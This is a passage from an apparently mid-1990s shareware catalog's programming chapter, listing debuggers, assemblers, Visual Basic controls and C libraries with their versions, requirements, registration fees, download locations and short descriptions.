simple report generator and data viewer is + included. + + + Product: Schooner + Graphical DOS software development system. See full + description on page 236. + + + 12.3 Debuggers + + See also: Computer programming, Languages, Assembler. + + Chapter 12, "Computer programming" 402 + + + + Product: D86 Debugger + Author: , 812-339-1811 + Version: 3.22 (01-20-90) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Registration fee: $60.00 (add $7.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, BBS, CompuServe, + mail support; 1-month return policy; bonus utilities; discounts + on other products. Lifetime free upgrading allowed. + Look for: D86V322.ZIP on BBSs (call 812-855-7252 to download it + at no charge); D86.ZIP on CompuServe in CIS:ZIPKEY forum + LIBrary 14 (or contact userID 71333,3154 for assistance). + Download size: 86k (about seven minutes with a 2400 baud modem) + Description: + A full-screen symbolic debugger designed for use with programs + assembled by A86. Has a constantly-updated display of register + values, flag settings, program disassembly near the current + location, and user-selected memory displays in a variety of + formats. Outstanding floating-point display and manipulation + capability. Single-key stepping of both procedures and + individual instructions. + + + 12.4 Languages + + See also: Utilities, System utilities, Batch & macro utilities, + Batch file compilers; Utilities, System utilities, + Configuration utilities; Database applications, Software tools + & add-ins. + + 12.4.1 Assembler + + See also: Computer programming, Debuggers. + + Product: A86 Macro Assembler + Author: , 812-339-1811 + Version: 3.22 (01-20-90) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Registration fee: $60.00 (add $7.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, BBS, CompuServe, + mail support; 1-month return policy; royalty-free runtime + + Chapter 12, "Computer programming" 403 + + + + license; bonus utilities; discounts on other products. + Lifetime free upgrading allowed. + Look for: A86V322.ZIP on BBSs (call 812-855-7252 to download it + at no charge); A86.ZIP on CompuServe in CIS:ZIPKEY forum + LIBrary 14 (or contact userID 71333,3154 for assistance). + Download size: 175k (about 13 minutes with a 2400 baud modem) + Awards & nominations: 1992 winner, Shareware Industry Awards. + 1986 winner, Public Brand Software contests for useful + programs. + Description: + The finest assembler available, at any price under any terms, + for the IBM PC & compatibles. It is more powerful, easier to + use, five times as fast, and ten times as compact as + Microsoft's MASM assembler. Assembles directly to a COM file, + or produces OBJ files that can be linked to high-level language + programs. + + + 12.4.2 BASIC + + Product: BASASM.LIB + Author: , 909-591-4956 + Version: 1.0 (06-22-92) + Needs: IBM PC, DOS 2.1 or better. + Registration fee: $20.00 + Registration benefits: 3 months of support; bonus utilities. + Look for: availability unknown on BBSs; BASASM.ZIP on CompuServe + in ZNT:PROGRAMMIN forum LIBrary 4 (or contact userID 73747,3537 + for assistance). + Download size: 290k (about 22 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Contains numerous low-level assembler language routines that + can be linked in with your BASIC programs. Provides file + handling, screen handling (including scrolling), DOS functions, + etc. + + + Product: Basic Training + BASIC language tutorial. See full description on page 426. + + Product: Simply Help! + Create hypertext documents - EXE/TSR/QB/PDS. See full + description on page 424. + + Chapter 12, "Computer programming" 404 + + + + 12.4.2.1 Visual BASIC + + Product: AA-Array.DLL + Author: + Version: 1.0 (01-01-95) + Needs: IBM 80386, Windows 3.0 or better. Visual Basic v2.0 or + later. + Strongly recommended: Visual Basic v3.0. + Registration fee: $30.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 12 months of unlimited phone, fax, CompuServe, mail + support; royalty-free source code; royalty-free runtime + license; bonus utilities; all ASP-wide offers (see page 5); + discounts on upgrades. Bonus routines for user-defined types + arrays. + Look for: AA-ARRAY.ZIP on BBSs; AAARRY.ZIP on CompuServe in + CIS:MSBASIC forum LIBrary 17 (or contact userID 100343,2570 for + assistance). + SWREG#: 4112 + PsL#: 11754 + Download size: 94k (about seven minutes with a 2400 baud modem) + Description: + Manages the creation, accessing, saving to and restoring from + disk of arrays with up to 4 Gigs elements and >64K of VB + strings. No VB imposed limits. Fast. Arrays can be Integer, + Long, Single, Double, Currency, or String. + + + Product: AAVBSORT.DLL + Author: + Version: 1.0 (01-01-95) + Needs: IBM 80386, Windows 3.0 or better. Visual Basic V2.0 or + better. + Strongly recommended: Visual Basic V3.0. + Registration fee: $30.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 12 months of unlimited phone, fax, CompuServe, mail + support; royalty-free source code; royalty-free runtime + license; bonus utilities; all ASP-wide offers (see page 5); + + Chapter 12, "Computer programming" 405 + + + + discounts on upgrades. Additional Sort Routines for User + Defined Types. + Look for: AAVBSORT.ZIP on BBSs; AASORT.ZIP on CompuServe in + CIS:MSBASIC forum LIBrary 17 (or contact userID 100343,2570 for + assistance). + SWREG#: 3971 + PsL#: 11753 + Download size: 94k (about seven minutes with a 2400 baud modem) + Description: + Sorts VB arrays fast by providing a set of simple to use + routines. The routines, coded in C++, are much faster than a + sort done in Visual Basic. Two types of sort routines are + available: in-place and sort via index. Arrays can be: Integer, + Long, Single, Double, Currency, String, or Fixed String. In the + registered version arrays can be of User defined types. + + + Product: Alarm VBX + Author: , 206-634-1443 + Version: 1.3 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $10.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 5). Lifetime + free upgrading allowed. + Look for: ALARM.ZIP on BBSs (call 206-634-0783 to download it at + no charge); ALARM.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1475 + PsL#: 11091 + Download size: 36k (about three minutes with a 2400 baud modem) + Description: + This control fires an event at various times of the day (under + your control). You can specify times such as 9:12am, 10:45pm, + every hour on the hour, every ten minues, one per minute, etc. + + + Product: BarCod VBX + Author: , 206-634-1443 + Version: 1.3 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + + Chapter 12, "Computer programming" 406 + + + + runtime license; all ASP-wide offers (see page 5). Lifetime + free upgrading allowed. + Look for: BARCOD.ZIP on BBSs (call 206-634-0783 to download it at + no charge); BARCOD.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1314 + PsL#: 11092 + Download size: 39k (about three minutes with a 2400 baud modem) + Description: + Displays bar codes for you. In supports Code 3 of 9, Code 2 of + 5, and more. Very simple. Place it on your form. Size it to + your liking. Set the bar code style. Then, just set the + Caption property. + + + Product: BmpLst VBX + Author: , 206-634-1443 + Version: 1.8 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $20.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 5). Lifetime + free upgrading allowed. + Look for: BMPLST.ZIP on BBSs (call 206-634-0783 to download it at + no charge); BMPLST.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1059 + PsL#: 11093 + Download size: 45k (about four minutes with a 2400 baud modem) + Description: + This control is a list box with bitmaps. Each item in the list + can have both a bitmap and text. The bitmaps can be placed on + any side of the text (top, bottom, left, right). + + + Product: Code.Print for Visual Basic + Author: , 206-759-2325 + Version: 2.23 (06-19-95) + Needs: IBM 80386, Windows for Workgroups 3.1 or better. 4000k + RAM; VGA monitor; Hard disk; HP DeskJet printer; HP LaserJet + printer; Postscript printer; Epson printer; VBRUN300.DLL. + Strongly recommended: SVGA monitor; Hayes-compatible modem. + Registration fee: $32.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, fax, CompuServe, mail support; 3-month return policy; + bonus utilities; discounts on other products; discounts on + + Chapter 12, "Computer programming" 407 + + + + upgrades. 12-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: availability unknown on BBSs; CPVB23.ZIP on CompuServe + in CIS:MSBASIC forum LIBrary 9 (or contact userID 70711,3300 + for assistance). + Download size: 270k (about 20 minutes with a 2400 baud modem) + Description: + The original VB source code documentation utility - printing + code since 1992. Has Win'95 style interface. Forerunner of the + award winning commercial version, Code.Print Pro (Pinnacle + Publishing Inc.), this defined the VB shareware source code + printing standard. Create presentation quality source code + documents. Full margin control, font selection, indexing and + more. A must have utility for any VB developer. + + + Product: CzarList for VBDOS + Author: , 915-595-8787 + Version: 1.10 (10-29-94) + Needs: IBM AT (80286), DOS 3.2 or better. 240k RAM. + Registration fee: $69.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, fax, BBS, CompuServe, mail support; royalty-free runtime + license; all ASP-wide offers (see page 5); discounts on other + products; discounts on upgrades. + Look for: CZLIS110.ZIP on BBSs (call 915-595-8705 to download it + at no charge); CZLIS1.ZIP on CompuServe in CIS:BASIC forum + LIBrary 10 (or contact userID 71031,3614 for assistance). + SWREG#: 2907 + PsL#: 11342 + Download size: 198k (about 15 minutes with a 2400 baud modem) + Description: + Three ListBox Controls for VBDOS Programmers. All controls use + XMS, EMS, or disk space. Bugfixes + Improvm. Store up to 32,765 + items per listbox without using any string space or conv. + memory. CzList is a general listbox, CzDir displays + alphabetically sorted directories in a graphical tree format, + CzFile displays files with size, date, time, attr. + + + Product: DFInfo VBX + Author: , 206-634-1443 + Version: 2.1 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + + Chapter 12, "Computer programming" 408 + + + + runtime license; all ASP-wide offers (see page 5). Lifetime + free upgrading allowed. + Look for: DFINFO.ZIP on BBSs (call 206-634-0783 to download it at + no charge); DFINFO.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1069 + PsL#: 11094 + Download size: 38k (about three minutes with a 2400 baud modem) + Description: + This custom control gives you disk and file information that + Visual Basic doesn't provide. It also allows you to change + some aspects of a file (attributes, size, date, time, etc.). + + + Product: FMDrop VBX + Author: , 206-634-1443 + Version: 1.1 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 5). Lifetime + free upgrading allowed. + Look for: FMDROP.ZIP on BBSs (call 206-634-0783 to download it at + no charge); FMDROP.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1378 + PsL#: 11095 + Download size: 28k (about two minutes with a 2400 baud modem) + Description: + This custom controls notifies you when a file has been dragged + and dropped from the Windows File Manager (FILEMGR). + + + Product: IniCon VBX + Author: , 206-634-1443 + Version: 3.1 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $5.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + + Chapter 12, "Computer programming" 409 + + + + runtime license; all ASP-wide offers (see page 5). Lifetime + free upgrading allowed. + Look for: INICON.ZIP on BBSs (call 206-634-0783 to download it at + no charge); INICON.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 833 + PsL#: 11096 + Download size: 32k (about three minutes with a 2400 baud modem) + Description: + This control makes INI file access simple. WIN.INI and private + INI file access are both supported. No API calls required. + + + Product: JoyStk VBX + Author: , 206-634-1443 + Version: 1.2 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 5). Lifetime + free upgrading allowed. + Look for: JOYSTK.ZIP on BBSs (call 206-634-0783 to download it at + no charge); JOYSTK.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1340 + PsL#: 11097 + Download size: 53k (about four minutes with a 2400 baud modem) + Description: + Gives your program information and events about the joystick's + movement and buttons. One or two normal joysticks, one + 4-button joystick (such as a Gravis GamePad), or on 3-D + joystick are supported. + + + Product: MenuEv VBX + Author: , 206-634-1443 + Version: 3.1 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $10.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + + Chapter 12, "Computer programming" 410 + + + + runtime license; all ASP-wide offers (see page 5). Lifetime + free upgrading allowed. + Look for: MENUEV.ZIP on BBSs (call 206-634-0783 to download it at + no charge); MENUEV.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1270 + PsL#: 11098 + Download size: 33k (about three minutes with a 2400 baud modem) + Description: + Provides menu selection notification. In other words, it tells + you when the user has selected a menu item. This is really + useful for status bar style help. Really easy to use. All you + need to do is place it on your form. There's nothing to set. + Events start coming in automatically. The events give you the + text and tag of the menu item selected. + + + Product: MS Mega Pack (VBXes) + Author: , 206-634-1443 + Version: 1.0 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $90.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 5). Lifetime + free upgrading allowed. + Look for: MSMEGA.ZIP on BBSs (call 206-634-0783 to download it at + no charge); MSMEGA.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 2909 + PsL#: 11462 + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + This package includes twelve of Mabry Software's most popular + controls: Alarm, BarCod, BmpLst, DFInfo, FMDrop, IniCon, + JoyStk, MenuEv, PerCnt, RoText, SoundX, and ZipInf. + + + Product: MSlot VBX + Author: , 206-634-1443 + Version: 1.0 (08-14-94) + Needs: IBM 80386, Windows for Workgroups 3.1 or better. Visual + Basic. + Registration fee: $30.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + + Chapter 12, "Computer programming" 411 + + + + runtime license; all ASP-wide offers (see page 5). Lifetime + free upgrading allowed. + Look for: MSLOT.ZIP on BBSs (call 206-634-0783 to download it at + no charge); MSLOT.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1848 + Download size: 29k (about two minutes with a 2400 baud modem) + Description: + This custom control for Visual Basic makes mailslot use simple. + No Windows API calls required. + + + Product: PerCnt VBX + Author: , 206-634-1443 + Version: 2.5 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $10.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 5). Lifetime + free upgrading allowed. + Look for: PERCNT.ZIP on BBSs (call 206-634-0783 to download it at + no charge); PERCNT.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 966 + PsL#: 11100 + Download size: 37k (about three minutes with a 2400 baud modem) + Description: + Displays a percentage bar on your form. This makes status + reporting very easy. 3-D effects, fonts, and colors are all at + your control. + + + Product: Probe VBX + Author: , 206-634-1443 + Version: 1.0 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + + Chapter 12, "Computer programming" 412 + + + + runtime license; all ASP-wide offers (see page 5). Lifetime + free upgrading allowed. + Look for: PROBE.ZIP on BBSs (call 206-634-0783 to download it at + no charge); PROBE.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1338 + PsL#: 11295 + Download size: 47k (about four minutes with a 2400 baud modem) + Description: + This VBX lets you examine and modify other controls' properties + at run-time. After telling it the name of the other control, + it will give you a list of the properties of that control. Can + also display a dialog box that will let you modify other + controls' properties (at run-time). Its dialog box makes it + possible to fiddle with the properties of other controls at + run-time. Common dialog boxes are used for fonts and colors to + make selection easier. + + + Product: RI-VB Database Toolkit v1.1 + Utility to develop VB and Access apps. See full description on + page 432. + + Product: RoText VBX + Author: , 206-634-1443 + Version: 1.3 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 5). Lifetime + free upgrading allowed. + Look for: ROTEXT.ZIP on BBSs (call 206-634-0783 to download it at + no charge); ROTEXT.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1338 + PsL#: 11101 + Download size: 37k (about three minutes with a 2400 baud modem) + Description: + This control lets you place a label on your forms at any angle + or degree of rotation. This control can be bound to a data + control. + + Chapter 12, "Computer programming" 413 + + + + Product: RUF100.ZIP + Author: , 404-594-7500 + Version: 1.0 (03-31-95) + Needs: IBM AT (80286), Windows 3.1 or better. 4000k RAM; VGA + monitor; Hard disk; Mouse; VBRUN300.DLL. Visual Basic + Professional 3.0 or higher. + Strongly recommended: XMS memory. + Registration fee: $50.00 (add $3.95 for shipping to U.S. + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, mail support; 3-month return policy; + royalty-free runtime license; site license; all ASP-wide offers + (see page 5); discounts on upgrades. + Look for: RUF100.ZIP on BBSs; RUF100.ZIP on CompuServe in + CIS:MSBASIC forum LIBrary 8 (or contact userID 75350,205 for + assistance). + SWREG#: 5262 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + A collection of VB modules containing functions for database + access, ini files, help files, date/time validation, message + boxes, mapi, error messages, and other routines and forms. Each + form and function is documented in included help file. Fully + functional. + + + Product: SoundX VBX + Author: , 206-634-1443 + Version: 1.3 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $10.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 5). Lifetime + free upgrading allowed. + Look for: SOUNDX.ZIP on BBSs (call 206-634-0783 to download it at + no charge); SOUNDX.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1272 + PsL#: 11102 + Download size: 36k (about three minutes with a 2400 baud modem) + Description: + This control provides Soundex and Metaphone algorithms. Soundex + and Metaphone convert words or names to codes that represent + how they "sound". This can be really useful in a database + application where users need to find names they may not know + how to spell exactly. Use this control to make it easier for + them. Just put the word or name you want convert in, and the + appropriate codes come out. + + Chapter 12, "Computer programming" 414 + + + + Product: Zip Server(TM) + PKZIP 2.04g compatible Windows utility. See full description + on page 47. + + Product: ZipInf VBX + Author: , 206-634-1443 + Version: 1.1 (08-14-94) + Needs: IBM AT (80286), Windows 3.1 or better. Visual Basic. + Registration fee: $10.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; 3-month return policy; royalty-free + runtime license; all ASP-wide offers (see page 5). Lifetime + free upgrading allowed. + Look for: ZIPINF.ZIP on BBSs (call 206-634-0783 to download it at + no charge); ZIPINF.ZIP on CompuServe in CIS:MSBASIC forum + LIBrary 5 (or contact userID 71231,2066 for assistance). + SWREG#: 1595 + PsL#: 11103 + Download size: 40k (about three minutes with a 2400 baud modem) + Description: + This control gives you information about the content + (directory) of a ZIP file. Many, many useful uses (File + Manager replacement, drive searching, etc.). + + + 12.4.3 C + + Product: C xref + Author: , 313-736-0239 + Version: 3.0a (11-01-93) + Needs: IBM PC, DOS 3.2 or better. + Strongly recommended: Hard disk. + Registration fee: $24.95 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; all ASP- + wide offers (see page 5). Lifetime free upgrading allowed. 10 + free update disk(s) sent out. + Look for: availability unknown on BBSs; CXREF3.ZIP on CompuServe + in CIS:PCPROG forum LIBrary 0 (or contact userID 71573,616 for + assistance). + SWREG#: 1394 + Download size: 90k (about seven minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + C programmers will find this useful for program debugging, + documentation, maintenance and modification. Generates the + following output: + * A list of the module's global variables and constants, + along with the line numbers they appear on + * A summary listing of the module's functions + * A verbose list of all the module's functions + + Chapter 12, "Computer programming" 415 + + + + * A tree that displays all of the functions calling + hierarchy + + + Product: c-scope + Easy to use C program static analysis tool. See full + description on page 433. + + Product: EMS4C Library + Author: , 205-881-4630 + Version: 1.0 (10-18-93) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EMS + memory; XMS memory. + Strongly recommended: Hard disk. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited fax, BBS, newsletter, + mail support; royalty-free source code; bonus utilities; all + ASP-wide offers (see page 5). + Look for: EMS4C10.ZIP on BBSs (call 205-880-9748 to download it + at no charge); EMSC10.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 3 (or contact userID 70671,1340 for assistance); + EMS4C10.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 10912 + Download size: 42k (about three minutes with a 2400 baud modem) + Description: + Implements version 3.2 of the LIM (Lotus-Intel-Microsoft) + specification for expanded memory. It runs with version 3.2 and + 4.0 of the LIM specification. Included is the EMM4C library + which allows C programmers to allocate and free EMS memory + similiar to malloc() and free(). + + + Product: Keyed File System (DOS) + MS/C subroutines for keyed file support. See full description + on page 399. + + Product: LZW Data Compr. Lib for Windows + Author: , 205-881-4630 + Version: 1.0 (07-12-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Strongly recommended: Hard disk. + Registration fee: $45.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; royalty-free source code; all ASP- + + Chapter 12, "Computer programming" 416 + + + + wide offers (see page 5); disks of other shareware; + registration commissions. + Look for: LZW4W10.ZIP on BBSs (call 205-880-9748 to download it + at no charge); LZWW10.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 3 (or contact userID 70671,1340 for assistance); + LZW4W10.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 11482 + Download size: 32k (about three minutes with a 2400 baud modem) + Description: + A data compression library for C Windows programmers which uses + the LZW algorithm as published in research papers by Lempel, + Ziv, ands Welch. Supports Borland C/C++ and Microsoft C/C++ + Windows compilers. + + + Product: LZW Data Compression for C + Author: , 205-881-4630 + Version: 1.4 (06-01-94) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Strongly recommended: Hard disk. + Registration fee: $45.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; royalty-free source code; all ASP- + wide offers (see page 5); disks of other shareware. + Look for: LZW4C14.ZIP on BBSs (call 205-880-9748 to download it + at no charge); LZWC14.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 3 (or contact userID 70671,1340 for assistance); + LZW4C14.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 10910 + Download size: 36k (about three minutes with a 2400 baud modem) + Description: + A data compression library for C programmers based on the LZW + algorithm as published in research papers by Lempel, Ziv, and + Welch. The LZW algorithm is probably the best generic + compression algorithm know today. Supports Borland C, Turbo C, + Microsoft C, and MIX Power C. Includes example programs (with + source code) to compress & expand a single file, create a + multi-file archive, extract files from the archive, and a LZW + test program. + + Chapter 12, "Computer programming" 417 + + + + Product: MEGIK + Author: + Version: 1.1 (09-20-94) + Needs: IBM PC, DOS 2.1 or better. EGA monitor. Microsoft C 6.0 + or higher; or Borland C++ 3.x. + Strongly recommended: Hard disk. + Registration fee: $99.00 (add $12.00 for shipping to U.S. + addresses) (add $12.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited fax, mail support; + royalty-free runtime license; discounts on upgrades. + Look for: MGK110*.* on BBSs (multiple files). + PsL#: 11297 + Download size: 410k (about 31 minutes with a 2400 baud modem) + Description: + Lets you create powered GUI apps for DOS, Windows, OS/2. With + the same source code apps run portably on all platforms. The + API supports windows, menus, dialogs, controls, events, + graphics, bitmaps, icons, fonts and more. Easier and faster to + program than native GUIs. Example code. Over 300 pages of + comprehensive documentation. + + + Product: Personal Comm Lib for Windows + Author: , 205-881-4630 + Version: 1.1 (08-01-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Strongly recommended: Hard disk; Hayes-compatible modem. + Registration fee: $65.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; royalty-free source code; bonus + utilities; all ASP-wide offers (see page 5); disks of other + shareware. + Look for: PCL4W11.ZIP on BBSs (call 205-880-9748 to download it + at no charge); PCLW11.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 3 (or contact userID 70671,1340 for assistance); + PCL4W11.ZIP on GEnie in IBMPC forum LIBrary 4. + PsL#: 11171 + Download size: 78k (about six minutes with a 2400 baud modem) + Description: + An asynchronous comm library for Windows developers. Supports + COM1 to COM4 from 300 to 115200 baud, 4 ports concurrently, all + memory models, DigiBoard PC/4 & PC/8, 16550 UART, interrupt + driven, RTS/CTS flow control. Requires Microsoft C 7.0 or + Borland C 3.1 & 4.0. Includes simple windows terminal program. + + Chapter 12, "Computer programming" 418 + + + + Product: Personal Comm Library for C + Author: , 205-881-4630 + Version: 4.2 (09-01-94) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Strongly recommended: Hayes-compatible modem. + Registration fee: $65.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, + newsletter, mail support; source code; bonus utilities; all + ASP-wide offers (see page 5); disks of other shareware. + Look for: PCL4C42.ZIP on BBSs (call 205-881-9748 to download it + at no charge); PCLC42.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 3 (or contact userID 70671,1340 for assistance); + PCL4C42.ZIP on GEnie in IBMPC forum LIBrary 4. + SWREG#: 287 + PsL#: 10908 + Download size: 85k (about seven minutes with a 2400 baud modem) + Description: + An asynchronous communications library supporting COM1 to COM16 + from 300 to 115200 baud, 4 ports concurrently, all memory + models, DigiBoard PC/4 & PC/8, dumb BOCA boards, + 8250/16450/16550 UARTS, interrupt 